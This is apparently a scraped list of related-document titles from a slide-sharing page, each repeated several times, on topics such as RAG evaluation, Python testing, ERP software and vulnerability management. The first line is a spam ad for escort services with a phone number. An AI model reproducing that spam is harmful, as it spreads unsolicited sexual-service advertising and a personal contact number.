Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
 
Retrieval Augmented Generation Evaluation with Ragas
Retrieval Augmented Generation Evaluation with RagasRetrieval Augmented Generation Evaluation with Ragas
Retrieval Augmented Generation Evaluation with Ragas
 
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python CodebaseEuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
 
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdfAcumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
 
Zaitechno Handheld Raman Spectrometer.pdf
Zaitechno Handheld Raman Spectrometer.pdfZaitechno Handheld Raman Spectrometer.pdf
Zaitechno Handheld Raman Spectrometer.pdf
 
Sonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdfSonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdf
 
Finetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and DefendingFinetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and Defending
 
Vulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive OverviewVulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive Overview
 

Evolution Of Web Security